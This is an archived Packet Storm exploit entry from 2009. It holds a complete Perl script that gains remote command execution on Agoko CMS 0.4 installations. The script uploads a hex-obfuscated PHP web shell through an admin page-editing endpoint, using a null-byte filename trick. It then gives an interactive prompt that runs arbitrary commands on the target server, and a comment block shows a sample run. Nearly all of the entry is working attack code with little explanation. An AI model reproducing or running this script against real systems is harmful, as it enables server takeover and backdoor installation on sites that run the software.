Agoko CMS 0.4 Command Execution

2009-09-10T00:00:00
ID PACKETSTORM:81103
Type packetstorm
Reporter StAkeR
Modified 2009-09-10T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
print q~  
--------------------------------------------------  
Agoko CMS <= 0.4 remote commands execution exploit  
by staker  
mail: staker[at]hotmail[dot]it  
--------------------------------------------------  
  
[*] Usage -> perl [xpl.pl] [host] [path]  
[*] Example -> perl agk.pl localhost /Agoko  
  
~;  
  
  
#>-----------<#  
#>- Working -<#  
#>-----------<#########################################  
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #  
# #  
# -------------------------------------------------- #  
# Agoko CMS <= 0.4 remote commands execution exploit #  
# by staker #  
# mail: staker[at]hotmail[dot]it #  
# -------------------------------------------------- #  
# #  
# [*] Usage -> perl [xpl.pl] [host] [path] #  
# [*] Example -> perl agk.pl localhost /Agoko #  
# #  
# shell already exists. #  
# #  
# Agoko[shell]:~$ uname -n -r #  
# #  
# death 2.6.27-7-generic #  
#######################################################  
  
  
use IO::Socket;  
use LWP::Simple;  
  
  
my $host = shift;  
my $path = shift || exit(0);  
  
  
check_shell($host,$path);  
  
  
sub check_shell() {  
my $host = $_[0];  
my $path = $_[1] || die $!;  
  
my $packet = "GET /$path/content/shell_vup.php HTTP/1.1\r\n".  
"Host: $host\r\n".  
"Cookie: bany=love_me\r\n".  
"User-Agent: Lynx (textmode)\r\n".  
"Connection: close\r\n\r\n";  
  
if (give_kt($host,$packet) =~ /bany wtf/i) {  
print "[*] shell already exists.\n";  
load_cmd($host,$path);  
}  
else {  
print "[*] exploiting..\n";  
inject_shell($host,$path);  
}   
}   
  
  
sub inject_shell() {  
my ($host,$path) = @_;   
  
my $shell = "\x3C\x3F\x70\x68\x70\x20\x20\x20\x20\x20\x20\x65\x72\x72".  
"\x6F\x72\x5F\x72\x65\x70\x6F\x72\x74\x69\x6E\x67\x28\x45".  
"\x5F\x41\x4C\x4C\x29\x3B\x20\x20\x20\x20\x20\x20\x20\x20".  
"\x20\x20\x20\x20\x69\x66\x20\x28\x69\x73\x73\x65\x74\x28".  
"\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x29".  
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x61\x73\x73".  
"\x74\x68\x72\x75\x28\x73\x74\x72\x69\x70\x73\x6C\x61\x73".  
"\x68\x65\x73\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64".  
"\x27\x5D\x29\x29\x3B\x20\x20\x20\x20\x20\x20\x65\x6C\x73".  
"\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x65\x28".  
"\x22\x62\x61\x6E\x79\x20\x77\x74\x66\x22\x29\x3B\x20\x20".  
"\x20\x20\x20\x20\x3F\x3E\x20";  
  
  
my $data = "filename=shell_vup.php\x00&text=$shell&Submit=Speichern";  
  
my $packet = "POST /$path/admintools/editpage-2.php HTTP/1.1\r\n".  
"Host: $host\r\n".  
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".  
"Cookie: bany=love_me\r\n".  
"Content-Type: application/x-www-form-urlencoded\r\n".  
"Content-Length: ".length($data)."\r\n".  
"Connection: close\r\n\r\n".  
$data;   
  
if (give_kt($host,$packet) =~ /erfolgreich eingetragen/i)   
{  
load_cmd($host,$path)   
}  
else   
{  
die "[*] Exploit failed.\n";  
}   
  
}   
  
  
sub load_cmd() {  
my $host = $_[0];  
my $path = $_[1];  
  
while (1)   
{  
print "\nAgoko[shell]:~\$ ";  
chomp (my $cmd = <STDIN>);  
  
exit(0) if $cmd =~ /^(exit|quit|out)+$/i;  
  
getprint("http://$host/$path/content/shell_vup.php?cmd=$cmd");  
}   
}  
  
  
sub give_kt() {  
my $input = $_[0];  
my $heads = $_[1] || die $!;  
  
my $result;  
my $socket = IO::Socket::INET->new(  
PeerAddr => $input,  
PeerPort => 80,  
Proto => 'tcp'  
) || die $!;  
  
$socket->send($heads);  
  
while (<$socket>) { $result .= $_; }  
  
return $result;  
}   
  
  
`